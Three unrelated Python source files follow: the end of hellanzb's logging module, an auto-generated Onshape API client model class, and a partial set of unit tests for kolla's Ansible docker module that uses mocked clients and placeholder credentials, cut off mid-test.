(currentLog, prefix, rtruncate(segment.nzbFile.showFilename,
length = 57), ACODE.F_DGREEN,
segment.nzbFile.downloadPercentage, ACODE.RESET, ACODE.F_DBLUE,
ACODE.RESET, ACODE.F_DRED, segment.nzbFile.getCurrentRate(),
ACODE.KILL_LINE)
currentLog = '%s\n' % currentLog
lastSegment = segment
# Fill in empty lines
for color, fillCount in colorCount.iteritems():
for count in range(fillCount):
i += 1
fill = i
if self.maxCount > 9:
prettyId = str(fill).zfill(2)
else:
prettyId = str(fill)
connectionPrefix = color + '[' + ACODE.RESET + '%s' + \
color + ']' + ACODE.RESET
prefix = connectionPrefix % prettyId
currentLog = '%s%s%s\n' % (currentLog, prefix, ACODE.KILL_LINE)
paused = ''
if Hellanzb.downloadPaused:
paused = '%s [Paused]%s' % (ACODE.F_DCYAN, ACODE.RESET)
totalSpeed = Hellanzb.getCurrentRate()
if totalSpeed == 0:
eta = '00:00:00'
else:
eta = prettyEta((Hellanzb.queue.totalQueuedBytes / 1024) / totalSpeed)
prefix = self.connectionPrefix % 'Total'
currentLog = '%s%s%s %.1fKB/s%s, %s%i MB%s queued, ETA: %s%s%s%s%s' % \
(currentLog, prefix, ACODE.F_DRED, totalSpeed, ACODE.RESET,
ACODE.F_DGREEN, Hellanzb.queue.totalQueuedBytes / 1024 / 1024, ACODE.RESET,
ACODE.F_YELLOW, eta, ACODE.RESET, paused, ACODE.KILL_LINE)
self.logger(currentLog)
self.currentLog = currentLog
self.scrollHeaders = []
def stdinEchoOff():
""" ECHO OFF standard input """
if not termios or Hellanzb.DAEMONIZE or Hellanzb.DISABLE_SCROLLER:
return
from Hellanzb.Log import debug
try:
fd = sys.stdin.fileno()
except:
return
try:
new = termios.tcgetattr(fd)
except Exception, e:
debug('stdinEchoOn error', e)
return
new[3] = new[3] & ~termios.ECHO # 3 == 'lflags'
try:
termios.tcsetattr(fd, termios.TCSADRAIN, new)
debug('stdinEchoOff - OFF')
except Exception, e:
debug('stdinEchoOff error', e)
def stdinEchoOn():
""" ECHO ON standard input """
if not termios or getattr(Hellanzb, 'DAEMONIZE', False) \
or getattr(Hellanzb, 'DISABLE_SCROLLER', False):
return
from Hellanzb.Log import debug
try:
fd = sys.stdin.fileno()
except:
return
try:
new = termios.tcgetattr(fd)
except Exception, e:
debug('stdinEchoOn error', e)
return
new[3] = new[3] | termios.ECHO # 3 == 'lflags'
try:
termios.tcsetattr(fd, termios.TCSAFLUSH, new)
debug('stdinEchoOn - ON')
except Exception, e:
debug('stdinEchoOn error', e)
def prettyException(exception):
""" Return a pretty rendition of the specified exception, or if no valid exception an
empty string """
message = ''
if exception != None:
if isinstance(exception, Exception):
message += getLocalClassName(exception.__class__) + ': ' + str(exception)
if not isinstance(exception, FatalError):
# Unknown/unexpected exception -- also show the stack trace
stackTrace = StringIO()
print_exc(file=stackTrace)
stackTrace = stackTrace.getvalue()
message = '%s\n%s' % (message, stackTrace)
return message
def lockScrollableHandlers(func, *args, **kwargs):
""" Call the function with all ScrollableHandlers locked """
lockedLoggers = []
for logger in Hellanzb.logger.handlers:
if isinstance(logger, ScrollableHandler):
logger.scrollLock.acquire()
lockedLoggers.append(logger)
func(*args, **kwargs)
[logger.scrollLock.release() for logger in lockedLoggers]
def initLogging():
""" Setup logging """
logging.addLevelName(ScrollableHandler.LOGFILE, 'LOGFILE')
logging.addLevelName(ScrollableHandler.SCROLL, 'SCROLL')
logging.addLevelName(ScrollableHandler.SHUTDOWN, 'SHUTDOWN')
logging.addLevelName(ScrollableHandler.NOLOGFILE, 'NOLOGFILE')
Hellanzb.logger = logging.getLogger('hellanzb')
#Hellanzb.logger.setLevel(ScrollableHandler.SCROLL)
Hellanzb.logger.setLevel(logging.DEBUG)
# Filter for stdout -- log warning and below
class OutFilter(logging.Filter):
def filter(self, record):
if record.levelno > logging.WARNING:
return False
# DEBUG will only go out to it's log file
elif record.levelno == logging.DEBUG:
return False
return True
outHdlr = ScrollableHandler(sys.stdout)
outHdlr.setLevel(ScrollableHandler.SCROLL)
outHdlr.addFilter(OutFilter())
Hellanzb.logger.addHandler(outHdlr)
errHdlr = ScrollableHandler(sys.stderr)
errHdlr.setLevel(logging.ERROR)
Hellanzb.logger.addHandler(errHdlr)
# Whether or not scroll mode is on
ScrollableHandler.scrollFlag = False
# Whether or not the scroller functionality is completely disabled
Hellanzb.DISABLE_SCROLLER = False
Hellanzb.recentLogs = RecentLogEntries(20)
def initLogFile(logFile = None, debugLogFile = None):
""" Initialize the log file. This has to be done after the config is loaded """
# map of ascii colors. for the kids
# This is initialized here, instead of initLogging, because it requires the config
# file to be loaded
Hellanzb.ACODE = ANSICodes()
maxBytes = backupCount = 0
if hasattr(Hellanzb, 'LOG_FILE_MAX_BYTES'):
maxBytes = unPrettyBytes(Hellanzb.LOG_FILE_MAX_BYTES)
if hasattr(Hellanzb, 'LOG_FILE_BACKUP_COUNT'):
backupCount = Hellanzb.LOG_FILE_BACKUP_COUNT
class LogFileFilter(logging.Filter):
def filter(self, record):
# SCROLL doesn't belong in log files and DEBUG will have it's own log file
if record.levelno == ScrollableHandler.SCROLL or record.levelno == logging.DEBUG \
or record.levelno == ScrollableHandler.NOLOGFILE:
return False
return True
# FIXME: should check if Hellanzb.LOG_FILE is set first
if logFile is not None:
Hellanzb.LOG_FILE = os.path.abspath(logFile)
if debugLogFile is not None:
Hellanzb.DEBUG_MODE = os.path.abspath(debugLogFile)
# Set this, maybe again, incase the -d option was specified
Hellanzb.DEBUG_MODE_ENABLED = True
# Ensure the log file's parent dirs exist and are writable
dirNames = {}
if hasattr(Hellanzb, 'LOG_FILE') and Hellanzb.LOG_FILE is not None:
dirNames['LOG_FILE'] = os.path.dirname(Hellanzb.LOG_FILE)
if hasattr(Hellanzb, 'DEBUG_MODE') and Hellanzb.DEBUG_MODE is not None:
dirNames['DEBUG_MODE'] = os.path.dirname(Hellanzb.DEBUG_MODE)
ensureDirs(dirNames)
if isPy2App():
Hellanzb.DISABLE_SCROLLER = True
if Hellanzb.LOG_FILE:
fileHdlr = RotatingFileHandlerNoLF(Hellanzb.LOG_FILE, maxBytes = maxBytes,
backupCount = backupCount)
fileHdlr.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
fileHdlr.addFilter(LogFileFilter())
Hellanzb.logger.addHandler(fileHdlr)
if Hellanzb.DEBUG_MODE_ENABLED:
class DebugFileFilter(logging.Filter):
def filter(self, record):
if record.levelno > logging.DEBUG or record.levelno == ScrollableHandler.NOLOGFILE:
return False
return True
debugFileHdlr = RotatingFileHandlerNoLF(Hellanzb.DEBUG_MODE, maxBytes = maxBytes,
backupCount = backupCount)
debugFileHdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
debugFileHdlr.setLevel(logging.DEBUG)
debugFileHdlr.addFilter(DebugFileFilter())
Hellanzb.logger.addHandler(debugFileHdlr)
# Direct twisted log output via the custom LogObserver
startLoggingWithObserver(HellaTwistedLogObserver())
"""
Copyright (c) 2005 Philip Jenvey <pjenvey@groovie.org>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author or contributors may not be used to endorse or
promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
$Id$
"""
|
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_annotation231
except ImportError:
btp_annotation231 = sys.modules["onshape_client.oas.models.btp_annotation231"]
try:
from onshape_client.oas.models import btp_expression9
except ImportError:
btp_expression9 = sys.modules["onshape_client.oas.models.btp_expression9"]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
try:
from onshape_client.oas.models import btp_statement269
except ImportError:
btp_statement269 = sys.modules["onshape_client.oas.models.btp_statement269"]
try:
from onshape_client.oas.models import btp_statement_expression275_all_of
except ImportError:
btp_statement_expression275_all_of = sys.modules[
"onshape_client.oas.models.btp_statement_expression275_all_of"
]
class BTPStatementExpression275(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("documentation_type",): {
"FUNCTION": "FUNCTION",
"PREDICATE": "PREDICATE",
"CONSTANT": "CONSTANT",
"ENUM": "ENUM",
"USER_TYPE": "USER_TYPE",
"FEATURE_DEFINITION": "FEATURE_DEFINITION",
"FILE_HEADER": "FILE_HEADER",
"UNDOCUMENTABLE": "UNDOCUMENTABLE",
"UNKNOWN": "UNKNOWN",
},
}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"expression": (btp_expression9.BTPExpression9,), # noqa: E501
"atomic": (bool,), # noqa: E501
"documentation_type": (str,), # noqa: E501
"end_source_location": (int,), # noqa: E501
"node_id": (str,), # noqa: E501
"short_descriptor": (str,), # noqa: E501
"space_after": (btp_space10.BTPSpace10,), # noqa: E501
"space_before": (btp_space10.BTPSpace10,), # noqa: E501
"space_default": (bool,), # noqa: E501
"start_source_location": (int,), # noqa: E501
"annotation": (btp_annotation231.BTPAnnotation231,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"expression": "expression", # noqa: E501
"atomic": "atomic", # noqa: E501
"documentation_type": "documentationType", # noqa: E501
"end_source_location": "endSourceLocation", # noqa: E501
"node_id": "nodeId", # noqa: E501
"short_descriptor": "shortDescriptor", # noqa: E501
"space_after": "spaceAfter", # noqa: E501
"space_before": "spaceBefore", # noqa: E501
"space_default": "spaceDefault", # noqa: E501
"start_source_location": "startSourceLocation", # noqa: E501
"annotation": "annotation", # noqa: E501
}
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
"_composed_instances",
"_var_name_to_model_instances",
"_additional_properties_model_instances",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_statement_expression275.BTPStatementExpression275 - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
expression (btp_expression9.BTPExpression9): [optional] # noqa: E501
atomic (bool): [optional] # noqa: E501
documentation_type (str): [optional] # noqa: E501
end_source_location (int): [optional] # noqa: E501
node_id (str): [optional] # noqa: E501
short_descriptor (str): [optional] # noqa: E501
space_after (btp_space10.BTPSpace10): [optional] # noqa: E501
space_before (btp_space10.BTPSpace10): [optional] # noqa: E501
space_default (bool): [optional] # noqa: E501
start_source_location (int): [optional] # noqa: E501
annotation (btp_annotation231.BTPAnnotation231): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
constant_args = {
"_check_type": _check_type,
"_path_to_item": _path_to_item,
"_from_server": _from_server,
"_configuration": _configuration,
}
required_args = {}
# remove args whose value is Null because they are unset
required_arg_names = list(required_args.keys())
for required_arg_name in required_arg_names:
if required_args[required_arg_name] is nulltype.Null:
del required_args[required_arg_name]
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in six.iteritems(kwargs):
if (
var_name in unused_args
and self._configuration is not None
and self._configuration.discard_unknown_keys
and not self._additional_properties_model_instances
):
# discard variable.
continue
setattr(self, var_name, var_value)
@staticmethod
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
return {
"anyOf": [],
"allOf": [
btp_statement269.BTPStatement269,
btp_statement_expression275_all_of.BTPStatementExpression275AllOf,
],
"oneOf": [],
}
|
|
#!/usr/bin/env python
# Copyright 2016 NEC Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import imp
import os
import sys
try:
from unittest import mock
except ImportError:
import mock
from docker import errors as docker_error
from oslotest import base
this_dir = os.path.dirname(sys.modules[__name__].__file__)
sys.modules['ansible'] = mock.MagicMock()
sys.modules['ansible.module_utils'] = mock.MagicMock()
sys.modules['ansible.module_utils.basic'] = mock.MagicMock()
kolla_docker_file = os.path.join(this_dir, '..', 'ansible',
'library', 'kolla_docker.py')
kd = imp.load_source('kolla_docker', kolla_docker_file)
class ModuleArgsTest(base.BaseTestCase):
def test_module_args(self):
argument_spec = dict(
common_options=dict(required=False, type='dict', default=dict()),
action=dict(
required=True, type='str',
choices=['compare_container', 'compare_image', 'create_volume',
'get_container_env', 'get_container_state',
'pull_image', 'recreate_or_restart_container',
'remove_container', 'remove_volume',
'restart_container', 'start_container',
'stop_container']),
api_version=dict(required=False, type='str', default='auto'),
auth_email=dict(required=False, type='str'),
auth_password=dict(required=False, type='str', no_log=True),
auth_registry=dict(required=False, type='str'),
auth_username=dict(required=False, type='str'),
detach=dict(required=False, type='bool', default=True),
labels=dict(required=False, type='dict', default=dict()),
name=dict(required=False, type='str'),
environment=dict(required=False, type='dict'),
image=dict(required=False, type='str'),
ipc_mode=dict(required=False, type='str', choices=['host', '']),
cap_add=dict(required=False, type='list', default=list()),
security_opt=dict(required=False, type='list', default=list()),
pid_mode=dict(required=False, type='str', choices=['host', '']),
privileged=dict(required=False, type='bool', default=False),
graceful_timeout=dict(required=False, type='int', default=10),
remove_on_exit=dict(required=False, type='bool', default=True),
restart_policy=dict(
required=False, type='str', choices=['no',
'never',
'on-failure',
'always',
'unless-stopped']),
restart_retries=dict(required=False, type='int', default=10),
state=dict(required=False, type='str', default='running',
choices=['running',
'exited',
'paused']),
tls_verify=dict(required=False, type='bool', default=False),
tls_cert=dict(required=False, type='str'),
tls_key=dict(required=False, type='str'),
tls_cacert=dict(required=False, type='str'),
volumes=dict(required=False, type='list'),
volumes_from=dict(required=False, type='list')
)
required_if = [
['action', 'pull_image', ['image']],
['action', 'start_container', ['image', 'name']],
['action', 'compare_container', ['name']],
['action', 'compare_image', ['name']],
['action', 'create_volume', ['name']],
['action', 'get_container_env', ['name']],
['action', 'get_container_state', ['name']],
['action', 'recreate_or_restart_container', ['name']],
['action', 'remove_container', ['name']],
['action', 'remove_volume', ['name']],
['action', 'restart_container', ['name']],
['action', 'stop_container', ['name']]
]
kd.AnsibleModule = mock.MagicMock()
kd.generate_module()
kd.AnsibleModule.assert_called_with(
argument_spec=argument_spec,
required_if=required_if,
bypass_checks=False
)
FAKE_DATA = {
'params': {
'detach': True,
'environment': {},
'host_config': {
'network_mode': 'host',
'ipc_mode': '',
'cap_add': None,
'security_opt': None,
'pid_mode': '',
'privileged': False,
'volumes_from': None,
'restart_policy': 'unless-stopped',
'restart_retries': 10},
'labels': {'build-date': '2016-06-02',
'kolla_version': '2.0.1',
'license': 'GPLv2',
'name': 'ubuntu Base Image',
'vendor': 'ubuntuOS'},
'image': 'myregistrydomain.com:5000/ubuntu:16.04',
'name': 'test_container',
'volumes': None,
'tty': True
},
'images': [
{'Created': 1462317178,
'Labels': {},
'VirtualSize': 120759015,
'ParentId': '',
'RepoTags': ['myregistrydomain.com:5000/ubuntu:16.04'],
'Id': 'sha256:c5f1cf30',
'Size': 120759015},
{'Created': 1461802380,
'Labels': {},
'VirtualSize': 403096303,
'ParentId': '',
'RepoTags': ['myregistrydomain.com:5000/centos:7.0'],
'Id': 'sha256:336a6',
'Size': 403096303}
],
'containers': [
{'Created': 1463578194,
'Status': 'Up 23 hours',
'HostConfig': {'NetworkMode': 'default'},
'Id': 'e40d8e7187',
'Image': 'myregistrydomain.com:5000/ubuntu:16.04',
'ImageID': 'sha256:c5f1cf30',
'Labels': {},
'Names': '/my_container'}
],
'container_inspect': {
'Config': {
'Env': ['KOLLA_BASE_DISTRO=ubuntu',
'KOLLA_INSTALL_TYPE=binary',
'KOLLA_INSTALL_METATYPE=rdo'],
'Hostname': 'node2',
'Volumes': {'/var/lib/kolla/config_files/': {}}},
'Mounts': {},
'NetworkSettings': {},
'State': {}
}
}
@mock.patch("docker.APIClient")
def get_DockerWorker(mod_param, mock_dclient):
module = mock.MagicMock()
module.params = mod_param
dw = kd.DockerWorker(module)
return dw
class TestContainer(base.BaseTestCase):
def setUp(self):
super(TestContainer, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
def test_create_container(self):
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.create_host_config = mock.MagicMock(
return_value=self.fake_data['params']['host_config'])
self.dw.create_container()
self.assertTrue(self.dw.changed)
self.dw.dc.create_container.assert_called_once_with(
**self.fake_data['params'])
def test_start_container_without_pull(self):
self.fake_data['params'].update({'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
'auth_email': 'fake_mail@foogle.com'})
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.images = mock.MagicMock(
return_value=self.fake_data['images'])
self.dw.dc.containers = mock.MagicMock(params={'all': 'True'})
new_container = copy.deepcopy(self.fake_data['containers'])
new_container.append({'Names': '/test_container',
'Status': 'Up 2 seconds'})
self.dw.dc.containers.side_effect = [self.fake_data['containers'],
new_container]
self.dw.check_container_differs = mock.MagicMock(return_value=False)
self.dw.create_container = mock.MagicMock()
self.dw.start_container()
self.assertFalse(self.dw.changed)
self.dw.create_container.assert_called_once_with()
def test_start_container_with_duplicate_name(self):
self.fake_data['params'].update({'name': 'my_container',
'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
'auth_email': 'fake_mail@foogle.com'})
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.images = mock.MagicMock(
return_value=self.fake_data['images'])
self.dw.dc.containers = mock.MagicMock(params={'all': 'True'})
updated_cont_list = copy.deepcopy(self.fake_data['containers'])
updated_cont_list.pop(0)
self.dw.dc.containers.side_effect = [self.fake_data['containers'],
self.fake_data['containers'],
self.fake_data['containers'],
updated_cont_list,
self.fake_data['containers']
]
self.dw.check_container_differs = mock.MagicMock(return_value=True)
self.dw.dc.remove_container = mock.MagicMock()
self.dw.create_container = mock.MagicMock()
self.dw.start_container()
self.assertTrue(self.dw.changed)
self.dw.dc.remove_container.assert_called_once_with(
container=self.fake_data['params'].get('name'),
force=True)
self.dw.create_container.assert_called_once_with()
def test_start_container(self):
self.fake_data['params'].update({'name': 'my_container',
'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
'auth_email': 'fake_mail@foogle.com'})
self.dw = get_DockerWorker(self.fake_data['params'])
self.dw.dc.images = mock.MagicMock(
return_value=self.fake_data['images'])
self.fake_data['containers'][0].update(
{'Status': 'Exited 2 days ago'})
self.dw.dc.containers = mock.MagicMock(
return_value=self.fake_data['containers'])
self.dw.check_container_differs = mock.MagicMock(return_value=False)
self.dw.dc.start = mock.MagicMock()
self.dw.start_container()
self.assertTrue(self.dw.changed)
self.dw.dc.start.assert_called_once_with(
container=self.fake_data['params'].get('name'))
def test_stop_container(self):
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'stop_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.stop_container()
self.assertTrue(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.stop.assert_called_once_with('my_container', timeout=10)
def test_stop_container_not_exists(self):
self.dw = get_DockerWorker({'name': 'fake_container',
'action': 'stop_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.stop_container()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake_container to stop")
def test_restart_container(self):
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'restart_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.fake_data['container_inspect'].update(
self.fake_data['containers'][0])
self.dw.dc.inspect_container.return_value = (
self.fake_data['container_inspect'])
self.dw.restart_container()
self.assertTrue(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.inspect_container.assert_called_once_with('my_container')
self.dw.dc.stop.assert_called_once_with('my_container', timeout=10)
self.dw.dc.start.assert_called_once_with('my_container')
def test_restart_container_not_exists(self):
self.dw = get_DockerWorker({'name': 'fake-container',
'action': 'restart_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.restart_container()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake-container")
def test_remove_container(self):
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'remove_container'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.remove_container()
self.assertTrue(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.remove_container.assert_called_once_with(
container='my_container',
force=True
)
def test_get_container_env(self):
fake_env = dict(KOLLA_BASE_DISTRO='ubuntu',
KOLLA_INSTALL_TYPE='binary',
KOLLA_INSTALL_METATYPE='rdo')
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'get_container_env'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.fake_data['container_inspect'].update(
self.fake_data['containers'][0])
self.dw.dc.inspect_container.return_value = (
self.fake_data['container_inspect'])
self.dw.get_container_env()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.inspect_container.assert_called_once_with('my_container')
self.dw.module.exit_json.assert_called_once_with(**fake_env)
def test_get_container_env_negative(self):
self.dw = get_DockerWorker({'name': 'fake_container',
'action': 'get_container_env'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.get_container_env()
self.assertFalse(self.dw.changed)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake_container")
def test_get_container_state(self):
State = {'Dead': False,
'ExitCode': 0,
'Pid': 12475,
'StartedAt': u'2016-06-07T11:22:37.66876269Z',
'Status': u'running'}
self.fake_data['container_inspect'].update({'State': State})
self.dw = get_DockerWorker({'name': 'my_container',
'action': 'get_container_state'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.dc.inspect_container.return_value = (
self.fake_data['container_inspect'])
self.dw.get_container_state()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.dc.inspect_container.assert_called_once_with('my_container')
self.dw.module.exit_json.assert_called_once_with(**State)
def test_get_container_state_negative(self):
self.dw = get_DockerWorker({'name': 'fake_container',
'action': 'get_container_state'})
self.dw.dc.containers.return_value = self.fake_data['containers']
self.dw.get_container_state()
self.assertFalse(self.dw.changed)
self.dw.dc.containers.assert_called_once_with(all=True)
self.dw.module.fail_json.assert_called_once_with(
msg="No such container: fake_container")
def test_recreate_or_restart_container_not_container(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS')})
self.dw.check_container = mock.Mock(return_value=None)
self.dw.start_container = mock.Mock()
self.dw.recreate_or_restart_container()
self.dw.start_container.assert_called_once_with()
def test_recreate_or_restart_container_container_copy_always(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS')})
self.dw.check_container = mock.Mock(
return_value=self.fake_data['containers'][0])
self.dw.restart_container = mock.Mock()
self.dw.check_container_differs = mock.Mock(return_value=False)
self.dw.recreate_or_restart_container()
self.dw.restart_container.assert_called_once_with()
def test_recreate_or_restart_container_container_copy_always_differs(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ALWAYS')})
self.dw.check_container = mock.Mock(
return_value=self.fake_data['containers'][0])
self.dw.start_container = mock.Mock()
self.dw.remove_container = mock.Mock()
self.dw.check_container_differs = mock.Mock(return_value=True)
self.dw.recreate_or_restart_container()
self.dw.remove_container.assert_called_once_with()
self.dw.start_container.assert_called_once_with()
def test_recreate_or_restart_container_container_copy_once(self):
self.dw = get_DockerWorker({
'environment': dict(KOLLA_CONFIG_STRATEGY='COPY_ONCE')})
self.dw.check_container = mock.Mock(
return_value=self.fake_data['containers'][0])
self.dw.start_container = mock.Mock()
self.dw.remove_container = mock.Mock()
self.dw.recreate_or_restart_container()
self.dw.remove_container.assert_called_once_with()
self.dw.start_container.assert_called_once_with()
class TestImage(base.BaseTestCase):
def setUp(self):
super(TestImage, self).setUp()
self.fake_data = copy.deepcopy(FAKE_DATA)
def test_check_image(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = self.fake_data['images']
return_data = self.dw.check_image()
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertEqual(self.fake_data['images'][0], return_data)
def test_check_image_before_docker_1_12(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/centos:7.0'})
self.fake_data['images'][0]['RepoTags'] = []
self.dw.dc.images.return_value = self.fake_data['images']
return_data = self.dw.check_image()
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertEqual(self.fake_data['images'][1], return_data)
def test_check_image_docker_1_12(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/centos:7.0'})
self.fake_data['images'][0]['RepoTags'] = None
self.dw.dc.images.return_value = self.fake_data['images']
return_data = self.dw.check_image()
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertEqual(self.fake_data['images'][1], return_data)
def test_compare_image(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = self.fake_data['images']
container_info = {'Image': 'sha256:c5f1cf40',
'Config': {'myregistrydomain.com:5000/ubuntu:16.04'}
}
return_data = self.dw.compare_image(container_info)
self.assertFalse(self.dw.changed)
self.dw.dc.images.assert_called_once_with()
self.assertTrue(return_data)
def test_get_image_id_not_exists(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = []
return_data = self.dw.get_image_id()
self.assertIsNone(return_data)
def test_get_image_id_exists(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04'})
self.dw.dc.images.return_value = ['sha256:47c3bdbcf99f0c1a36e4db']
return_data = self.dw.get_image_id()
self.assertEqual('sha256:47c3bdbcf99f0c1a36e4db', return_data)
def test_pull_image_new(self):
self.dw = get_DockerWorker(
{'image': 'myregistrydomain.com:5000/ubuntu:16.04',
'auth_username': 'fake_user',
'auth_password': 'fake_psw',
'auth_registry': 'myrepo/myapp',
